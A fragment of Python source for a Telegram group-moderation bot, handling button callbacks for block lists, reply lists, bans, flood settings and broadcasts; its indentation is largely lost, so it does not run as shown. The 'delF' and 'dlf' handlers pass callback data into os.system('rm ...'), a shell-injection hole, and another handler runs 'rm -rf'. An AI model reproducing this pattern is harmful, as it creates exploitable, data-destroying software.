Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if re.search("del(.*)replysBOT",date[0]):
rank = isrank(redis,userID,chatID)
if rank == "sudo":
t = date[0].replace("del","")
t = t.replace("BOT","")
if date[1] != "kb":
redis.delete("{}Nbot:{}".format(BOT_ID,t))
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
redis.delete("{}Nbot:{}".format(BOT_ID,t))
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
Bot("answerCallbackQuery",{"callback_query_id":callback_query.id,"text":r.SudoOnle,"show_alert":True})
if date[0] == "delfromb":
Hash = date[1]
chat = date[3]
if redis.sismember("{}Nbot:groups".format(BOT_ID),chat):
if Hash == "blockanimations":
ID = callback_query.message.animation.file_id
redis.srem("{}Nbot:{}:{}".format(BOT_ID,chat,Hash),ID)
Bot("deleteMessage",{"chat_id":chatID,"message_id":message_id})
if Hash == "blockSTICKERs":
ID = callback_query.message.sticker.file_id
redis.srem("{}Nbot:{}:{}".format(BOT_ID,chat,Hash),ID)
Bot("deleteMessage",{"chat_id":chatID,"message_id":message_id})
if Hash == "blockphotos":
ID = callback_query.message.photo.file_id
redis.srem("{}Nbot:{}:{}".format(BOT_ID,chat,Hash),ID)
Bot("deleteMessage",{"chat_id":chatID,"message_id":message_id})
User_click = int((redis.get("{}Nbot:{}:floodClick".format(BOT_ID,userID)) or 1))
if User_click > 10:
BY = "<a href=\"tg://user?id={}\">{}</a>".format(userID,userFN)
Bot("sendMessage",{"chat_id":chatID,"text":r.banclick.format(BY),"disable_web_page_preview":True,"parse_mode":"html"})
redis.setex("{}Nbot:floodUsers:{}".format(BOT_ID,userID),60*2,"Ban")
redis.delete("{}Nbot:{}:floodClick".format(BOT_ID,userID))
if chatID == userID:
group = True
if group is True and int(date[2]) == userID and not redis.get("{}Nbot:floodUsers:{}".format(BOT_ID,userID)):
if date[0] == "delcheck":
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.notcertain, callback_data=json.dumps(["kickcheck","",userID])),InlineKeyboardButton(r.certain, callback_data=json.dumps(["certain","",userID]))]])
random.shuffle(reply_markup.inline_keyboard[0])
Bot("editMessageText",{"chat_id":chatID,"text":r.ucertain,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "certain":
Bot("restrictChatMember",{"chat_id": chatID,"user_id":userID,"can_send_messages": 1,"can_send_media_messages": 1,"can_send_other_messages": 1,"can_send_polls": 1,"can_change_info": 1,"can_add_web_page_previews": 1,"can_pin_messages": 1,})
T ="<a href=\"tg://user?id={}\">{}</a>".format(userID,Name(userFN))
Bot("editMessageText",{"chat_id":chatID,"text":r.unrestricted.format(T),"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
if date[0] == "kickcheck":
Bot("kickChatMember",{"chat_id":chatID,"user_id":userID})
T ="<a href=\"tg://user?id={}\">{}</a>".format(userID,Name(userFN))
crid = redis.get("{}Nbot:{}:creator".format(BOT_ID,chatID))
redis.sadd("{}Nbot:{}:bans".format(BOT_ID,chatID),userID)
reply_markup = InlineKeyboardMarkup([[InlineKeyboardButton(r.Corder, callback_data=json.dumps(["Cordertow",userID]))]])
Bot("editMessageText",{"chat_id":chatID,"text":r.bancheck.format(T),"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html","reply_markup":reply_markup})
if date[0] == "delF":
File = date[1]
os.system("rm ./files/"+File)
Bot("editMessageText",{"chat_id":chatID,"text":r.Delfile.format(File),"message_id":message_id,"parse_mode":"html","disable_web_page_preview":True})
if date[0] == "delFa":
os.system("rm -rf ./files/*")
Bot("editMessageText",{"chat_id":chatID,"text":r.Delfiles,"message_id":message_id,"parse_mode":"html","disable_web_page_preview":True})
if date[0] == "dlf":
File = date[1]
os.system("rm ./files/"+File)
url = "https://raw.githubusercontent.com/jack1eljoker1/Blackv7-files/master/"+File
out = requests.get(url).text
f = open("./files/"+File,"w+")
f.write(out)
f.close()
Bot("editMessageText",{"chat_id":chatID,"text":r.Dua.format(File),"message_id":message_id,"parse_mode":"html","disable_web_page_preview":True})
if date[0] == "au":
File = date[1]
if redis.sismember("{}Nbot:botfiles".format(BOT_ID),File):
redis.srem("{}Nbot:botfiles".format(BOT_ID),File)
else:
redis.sadd("{}Nbot:botfiles".format(BOT_ID),File)
onlyfiles = [f for f in listdir("files") if isfile(join("files", f))]
filesR = redis.smembers("{}Nbot:botfiles".format(BOT_ID))
array = []
for f in onlyfiles:
if f in filesR:
s = r.true
else:
s = r.false
array.append([InlineKeyboardButton(f+" "+s,callback_data=json.dumps(["au",f,userID]))])
kb = InlineKeyboardMarkup(array)
Bot("editMessageReplyMarkup",{"chat_id":chatID,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":kb})
if date[0] == "twostepset":
get = date[1]
if get == "eq":
redis.hset("{}Nbot:bancheck:t".format(BOT_ID),chatID,"two")
tx = r.Ttwo
g= "two"
if get == "two":
redis.hdel("{}Nbot:bancheck:t".format(BOT_ID),chatID)
g= "eq"
tx = r.Teq
kb = InlineKeyboardMarkup([[InlineKeyboardButton(r.tset.format(tx),callback_data=json.dumps(["twostepset",g,userID]))]])
Bot("editMessageReplyMarkup",{"chat_id":chatID,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":kb})
if date[0] == "floodset":
get = date[1]
if get == "ban":
redis.hset("{}Nbot:floodset".format(BOT_ID),chatID,"res")
tx = r.Tres
g= "res"
if get == "res":
redis.hset("{}Nbot:floodset".format(BOT_ID),chatID,"ban")
g= "ban"
tx = r.Tban
kb = InlineKeyboardMarkup([[InlineKeyboardButton(r.fset.format(tx),callback_data=json.dumps(["floodset",g,userID]))]])
Bot("editMessageReplyMarkup",{"chat_id":chatID,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":kb})
if date[0] == "delmsgclick":
Bot("deleteMessage",{"chat_id":chatID,"message_id":message_id})
Bot("deleteMessage",{"chat_id":chatID,"message_id":callback_query.message.reply_to_message.message_id})
if date[0] == "ckGPs":
rank = isrank(redis,userID,chatID)
if rank == "sudo":
Bot("editMessageText",{"chat_id":chatID,"text":r.ckpr,"message_id":message_id,"parse_mode":"html","disable_web_page_preview":True})
IDS = redis.smembers("{}Nbot:groups".format(BOT_ID))
i = 0
for ID in IDS:
get = Bot("getChat",{"chat_id":ID})
if get["ok"] == False:
redis.srem("{}Nbot:groups".format(BOT_ID),ID)
redis.sadd("{}Nbot:disabledgroups".format(BOT_ID),ID)
NextDay_Date = datetime.datetime.today() + datetime.timedelta(days=1)
redis.hset("{}Nbot:disabledgroupsTIME".format(BOT_ID),ID,str(NextDay_Date))
i+=1
time.sleep(0.3)
pr = redis.scard("{}Nbot:privates".format(BOT_ID))
gp = redis.scard("{}Nbot:groups".format(BOT_ID))
Bot("editMessageText",{"chat_id":chatID,"text":r.showstats.format(gp,pr)+r.Dckg.format(i),"message_id":message_id,"parse_mode":"html","disable_web_page_preview":True})
else:
Bot("answerCallbackQuery",{"callback_query_id":callback_query.id,"text":r.SudoOnle,"show_alert":True})
if date[0] == "Chlang":
name = date[1]
redis.srem("{}Nbot:lang:ar".format(BOT_ID),chatID)
redis.srem("{}Nbot:lang:arem".format(BOT_ID),chatID)
redis.srem("{}Nbot:lang:en".format(BOT_ID),chatID)
redis.sadd("{}Nbot:lang:{}".format(BOT_ID,name),chatID)
Bot("editMessageReplyMarkup",{"chat_id":chatID,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":Clang(client, callback_query,redis,r)})
if date[0] == "ShowDateUser":
t = IDrank(redis,userID,chatID,r)
msgs = (redis.hget("{}Nbot:{}:msgs".format(BOT_ID,chatID),userID) or 0)
edits = (redis.hget("{}Nbot:{}:edits".format(BOT_ID,chatID),userID) or 0)
rate = int(msgs)*100/20000
age = getAge(userID,r)
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(Name(userFN),url="t.me/BLACK_TEAM_4")],[InlineKeyboardButton(r.Rrank.format(t),url="t.me/BLACK_TEAM_4")],[InlineKeyboardButton(r.Rmsgs.format(msgs),url="t.me/BLACK_TEAM_4")],[InlineKeyboardButton(r.Rrate.format(str(rate)+"%"),url="t.me/BLACK_TEAM_4")],[InlineKeyboardButton(r.Redits.format(edits),url="t.me/BLACK_TEAM_4")],[InlineKeyboardButton(r.Rage.format(age),url="t.me/BLACK_TEAM_4")]])
Bot("editMessageReplyMarkup",{"chat_id":chatID,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if re.search("ShowO",date[0]):
T = date[0].replace("ShowO","")
rank = isrank(redis,userID,chatID)
if T == "lock":
reply_markup = getOR(rank,r,userID)
tx = r.LockO
if T == "admin":
reply_markup = getOR(rank,r,userID)
tx = r.AdminO
if T == "owner":
reply_markup = getOR(rank,r,userID)
tx = r.OwnerO
if T == "creator":
reply_markup = getOR(rank,r,userID)
tx = r.CreatorO
if T == "sudos":
reply_markup = getOR(rank,r,userID)
tx = r.SudosO
if T == "sudo":
reply_markup = getOR(rank,r,userID)
tx = r.SudoO
Bot("editMessageText",{"chat_id":chatID,"text":tx,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "sendtogroups":
Bot("editMessageText",{"chat_id":chatID,"text":r.PRsendtoGP,"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
done,dont = Sendto(redis,callback_query,"groups")
Bot("editMessageText",{"chat_id":chatID,"text":r.DsendtoGP.format(done,dont),"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
redis.delete("{}Nbot:donesend".format(BOT_ID))
redis.delete("{}Nbot:dontsend".format(BOT_ID))
if date[0] == "sendtoprivates":
Bot("editMessageText",{"chat_id":chatID,"text":r.PRsendtoPR,"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
done,dont = Sendto(redis,callback_query,"privates")
Bot("editMessageText",{"chat_id":chatID,"text":r.DsendtoPR.format(done,dont),"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
redis.delete("{}Nbot:donesend".format(BOT_ID))
redis.delete("{}Nbot:dontsend".format(BOT_ID))
if date[0] == "fwdtogroups":
Bot("editMessageText",{"chat_id":chatID,"text":r.PRsendtoGP,"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
done,dont = fwdto(redis,callback_query,"groups")
Bot("editMessageText",{"chat_id":chatID,"text":r.DsendtoGP.format(done,dont),"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
redis.delete("{}Nbot:donesend".format(BOT_ID))
redis.delete("{}Nbot:dontsend".format(BOT_ID))
if date[0] == "fwdtoprivates":
Bot("editMessageText",{"chat_id":chatID,"text":r.PRsendtoPR,"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
done,dont = fwdto(redis,callback_query,"privates")
Bot("editMessageText",{"chat_id":chatID,"text":r.DsendtoPR.format(done,dont),"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
redis.delete("{}Nbot:donesend".format(BOT_ID))
redis.delete("{}Nbot:dontsend".format(BOT_ID))
if date[0] == "kickme-yes":
Bot("kickChatMember",{"chat_id":chatID,"user_id":userID})
Bot("unbanChatMember",{"chat_id":chatID,"user_id":userID})
Bot("editMessageText",{"chat_id":chatID,"text":r.Dkickme,"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
if date[0] == "kickme-no":
Bot("editMessageText",{"chat_id":chatID,"text":r.Nkickme,"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
if date[0] == "delfromb":
Hash = date[1]
if Hash == "blockanimations":
ID = callback_query.message.animation.file_id
                redis.srem("{}Nbot:{}:{}".format(BOT_ID,chatID,Hash),ID)
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneUNblock,"message_id":message_id,"disable_web_page_preview":True})
if date[0] == "Blocklist":
Botuser = client.get_me().username
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(c.STword,callback_data=json.dumps(["showBlocklist","",userID])),InlineKeyboardButton(c.STgifs,url="https://telegram.me/{}?start=showBlocklist={}={}={}".format(Botuser,chatID,userID,"blockanimations")),],[InlineKeyboardButton(c.STphoto,url="https://telegram.me/{}?start=showBlocklist={}={}={}".format(Botuser,chatID,userID,"blockphotos")),InlineKeyboardButton(c.STsticker,url="https://telegram.me/{}?start=showBlocklist={}={}={}".format(Botuser,chatID,userID,"blockSTICKERs")),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.blocklist.format(r.blocklist2,title),"message_id":message_id,"parse_mode":"html","reply_markup":reply_markup})
if date[0] == "replylist":
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(c.STword,callback_data=json.dumps(["showreplylist","",userID])),InlineKeyboardButton(c.STgifs,callback_data=json.dumps(["showGFreplylist","",userID])),],[InlineKeyboardButton(c.STvoice,callback_data=json.dumps(["showVOreplylist","",userID])),InlineKeyboardButton(c.STsticker,callback_data=json.dumps(["showSTreplylist","",userID])),],[InlineKeyboardButton("Mp3",callback_data=json.dumps(["showAUreplylist","",userID]))]])
Bot("editMessageText",{"chat_id":chatID,"text":r.blocklist.format(r.replylist,title),"message_id":message_id,"parse_mode":"html","reply_markup":reply_markup})
if date[0] == "replylistBOT":
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(c.STword,callback_data=json.dumps(["showreplylistBOT","",userID])),InlineKeyboardButton(c.STgifs,callback_data=json.dumps(["showGFreplylistBOT","",userID])),],[InlineKeyboardButton(c.STvoice,callback_data=json.dumps(["showVOreplylistBOT","",userID])),InlineKeyboardButton(c.STsticker,callback_data=json.dumps(["showSTreplylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.blocklist.format(r.replylistBot,title),"message_id":message_id,"parse_mode":"html","reply_markup":reply_markup})
if date[0] == "alllist":
reply_markup=InlineKeyboardMarkup(
[[InlineKeyboardButton(c.STbanall,callback_data=json.dumps(["showbanall","",userID]))
,InlineKeyboardButton(c.STtkall,callback_data=json.dumps(["showtkall","",userID])),]
])
Bot("editMessageText",{"chat_id":chatID,"text":r.banlist,"message_id":message_id,"parse_mode":"html","reply_markup":reply_markup})
if date[0] == "delallban":
redis.delete("{}Nbot:bans".format(BOT_ID))
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["alllist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Ddelbanall,"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html","reply_markup":reply_markup})
if date[0] == "delalltk":
redis.delete("{}Nbot:restricteds".format(BOT_ID))
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["alllist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Ddeltkall,"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html","reply_markup":reply_markup})
if date[0] == "showBlocklist":
li = redis.smembers("{}Nbot:{}:blockTEXTs".format(BOT_ID,chatID))
if li:
words = ""
i = 1
for word in li:
words = words+"\n"+str(i)+" - "+word
i += 1
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.BlocklistRm,callback_data=json.dumps(["delListblockTEXTs","",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["Blocklist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":words,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["Blocklist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.BlocklistEm,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "showbanall":
arrays = redis.smembers("{}Nbot:bans".format(BOT_ID))
if arrays:
b = BYusers(arrays,chatID,redis,client)
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.allbandel,callback_data=json.dumps(["delallban","",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["alllist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":b,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup,"parse_mode":"markdown"})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["alllist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.allbanE,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "showtkall":
arrays = redis.smembers("{}Nbot:restricteds".format(BOT_ID))
if arrays:
b = BYusers(arrays,chatID,redis,client)
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.alltkdel,callback_data=json.dumps(["delalltk","",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["alllist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":b,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup,"parse_mode":"markdown"})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["alllist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.alltkE,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "showreplylist":
li = redis.hkeys("{}Nbot:{}:TXreplys".format(BOT_ID,chatID))
if li:
words = ""
i = 1
for word in li:
words = words+"\n"+str(i)+" - {"+word+"}"
i += 1
if len(words) > 3000:
Botuser = client.get_me().username
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.clickTOpv,url="https://telegram.me/{}?start=showreplylist={}={}={}".format(Botuser,chatID,userID,"TXreplys")),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Toolong,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.replylistRm,callback_data=json.dumps(["delTXreplys","kb",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":words,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.replylistEm,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "showAUreplylist":
li = redis.hkeys("{}Nbot:{}:AUreplys".format(BOT_ID,chatID))
if li:
words = ""
i = 1
for word in li:
words = words+"\n"+str(i)+" - {"+word+"}"
i += 1
if len(words) > 3000:
Botuser = client.get_me().username
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.clickTOpv,url="https://telegram.me/{}?start=showreplylist={}={}={}".format(Botuser,chatID,userID,"STreplys")),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Toolong,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("📂꒐ قائمة الصوتيات فارغة",callback_data=json.dumps(["delSTreplys","kb",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":words,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":"📂꒐ قائمة الصوتيات فارغة","message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "showSTreplylist":
li = redis.hkeys("{}Nbot:{}:STreplys".format(BOT_ID,chatID))
if li:
words = ""
i = 1
for word in li:
words = words+"\n"+str(i)+" - {"+word+"}"
i += 1
if len(words) > 3000:
Botuser = client.get_me().username
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.clickTOpv,url="https://telegram.me/{}?start=showreplylist={}={}={}".format(Botuser,chatID,userID,"STreplys")),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Toolong,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.STreplylistRm,callback_data=json.dumps(["delSTreplys","kb",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":words,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.STreplylistEm,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "showGFreplylist":
li = redis.hkeys("{}Nbot:{}:GFreplys".format(BOT_ID,chatID))
if li:
words = ""
i = 1
for word in li:
words = words+"\n"+str(i)+" - {"+word+"}"
i += 1
if len(words) > 3000:
Botuser = client.get_me().username
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.clickTOpv,url="https://telegram.me/{}?start=showreplylist={}={}={}".format(Botuser,chatID,userID,"GFreplys")),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Toolong,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.GFreplylistRm,callback_data=json.dumps(["delGFreplys","kb",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":words,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.GFreplylistEm,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "showVOreplylist":
li = redis.hkeys("{}Nbot:{}:VOreplys".format(BOT_ID,chatID))
if li:
words = ""
i = 1
for word in li:
words = words+"\n"+str(i)+" - {"+word+"}"
i += 1
if len(words) > 3000:
Botuser = client.get_me().username
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.clickTOpv,url="https://telegram.me/{}?start=showreplylist={}={}={}".format(Botuser,chatID,userID,"VOreplys")),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Toolong,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.VOreplylistRm,callback_data=json.dumps(["delVOreplys","kb",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":words,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.VOreplylistEm,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "showreplylistBOT":
li = redis.hkeys("{}Nbot:TXreplys".format(BOT_ID,chatID))
if li:
words = ""
i = 1
for word in li:
words = words+"\n"+str(i)+" - {"+word+"}"
i += 1
if len(words) > 3000:
Botuser = client.get_me().username
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.clickTOpv,url="https://telegram.me/{}?start=showreplylistBOT={}={}={}".format(Botuser,chatID,userID,"TXreplys")),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Toolong,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.replylistRm,callback_data=json.dumps(["delTXreplysBOT","kb",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":words,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.replylistEm,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "showSTreplylistBOT":
li = redis.hkeys("{}Nbot:STreplys".format(BOT_ID,chatID))
if li:
words = ""
i = 1
for word in li:
words = words+"\n"+str(i)+" - {"+word+"}"
i += 1
if len(words) > 3000:
Botuser = client.get_me().username
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.clickTOpv,url="https://telegram.me/{}?start=showreplylistBOT={}={}={}".format(Botuser,chatID,userID,"STreplys")),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Toolong,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.STreplylistRm,callback_data=json.dumps(["delSTreplysBOT","kb",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":words,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.STreplylistEm,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "showGFreplylistBOT":
li = redis.hkeys("{}Nbot:GFreplys".format(BOT_ID,chatID))
if li:
words = ""
i = 1
for word in li:
words = words+"\n"+str(i)+" - {"+word+"}"
i += 1
if len(words) > 3000:
Botuser = client.get_me().username
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.clickTOpv,url="https://telegram.me/{}?start=showreplylistBOT={}={}={}".format(Botuser,chatID,userID,"GFreplys")),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Toolong,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.GFreplylistRm,callback_data=json.dumps(["delGFreplysBOT","kb",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":words,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.GFreplylistEm,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "showVOreplylistBOT":
li = redis.hkeys("{}Nbot:VOreplys".format(BOT_ID,chatID))
if li:
words = ""
i = 1
for word in li:
words = words+"\n"+str(i)+" - {"+word+"}"
i += 1
if len(words) > 3000:
Botuser = client.get_me().username
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.clickTOpv,url="https://telegram.me/{}?start=showreplylistBOT={}={}={}".format(Botuser,chatID,userID,"VOreplys")),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Toolong,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.VOreplylistRm,callback_data=json.dumps(["delVOreplysBOT","kb",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":words,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.VOreplylistEm,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "listCH":
if int(date[1]) != 4:
Bot("editMessageText",{"chat_id":chatID,"text":r.settings.format(title),"message_id":message_id,"disable_web_page_preview":True,"reply_markup":st(client, callback_query,redis,int(date[1])),"parse_mode":"html"})
#Bot("editMessageReplyMarkup",{"chat_id":chatID,"message_id":message_id,"reply_markup":st(client, callback_query,redis,int(date[3]))})
else:
T = (redis.hget("{}Nbot:time_ck".format(BOT_ID),chatID) or 3)
m = (redis.hget("{}Nbot:max_msg".format(BOT_ID),chatID) or 10)
Bot("editMessageText",{"chat_id":chatID,"text":r.st2.format(T,m),"message_id":message_id,"disable_web_page_preview":True,"reply_markup":st(client, callback_query,redis,int(date[1])),"parse_mode":"html"})
if date[0] == "listCH-res":
Bot("editMessageReplyMarkup",{"chat_id":chatID,"message_id":message_id,"reply_markup":st_res(client, callback_query,redis,int(date[1]))})
